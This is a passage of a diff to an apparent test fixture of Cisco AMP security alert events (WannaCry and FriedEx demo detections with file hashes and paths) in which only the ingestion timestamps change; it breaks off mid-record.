"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "code": "553648147", "kind": "alert", @@ -2125,7 +2125,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389059300Z", + "ingested": "2021-12-14T14:41:01.444869090Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2213,7 +2213,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389063900Z", + "ingested": "2021-12-14T14:41:01.444869485Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -2287,7 +2287,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389067900Z", + "ingested": "2021-12-14T14:41:01.444869988Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389071100Z", + "ingested": "2021-12-14T14:41:01.444870506Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2439,7 +2439,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389075200Z", + "ingested": "2021-12-14T14:41:01.444871013Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -2527,7 +2527,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389080600Z", + "ingested": "2021-12-14T14:41:01.444871476Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -2601,7 +2601,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389086Z", + "ingested": "2021-12-14T14:41:01.444871936Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -2673,7 +2673,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389091500Z", + "ingested": "2021-12-14T14:41:01.444872431Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -2757,7 +2757,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389097100Z", + "ingested": "2021-12-14T14:41:01.444873119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -2847,7 +2847,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389102500Z", + "ingested": "2021-12-14T14:41:01.444873519Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -2921,7 +2921,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389107800Z", + "ingested": "2021-12-14T14:41:01.444873971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -3009,7 +3009,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389113200Z", + "ingested": "2021-12-14T14:41:01.444874409Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -3099,7 +3099,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389118500Z", + "ingested": "2021-12-14T14:41:01.444875099Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -3189,7 +3189,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389124100Z", + "ingested": "2021-12-14T14:41:01.444875651Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -3288,7 +3288,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389129500Z", + "ingested": "2021-12-14T14:41:01.444876166Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3387,7 +3387,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389134900Z", + "ingested": "2021-12-14T14:41:01.444876613Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\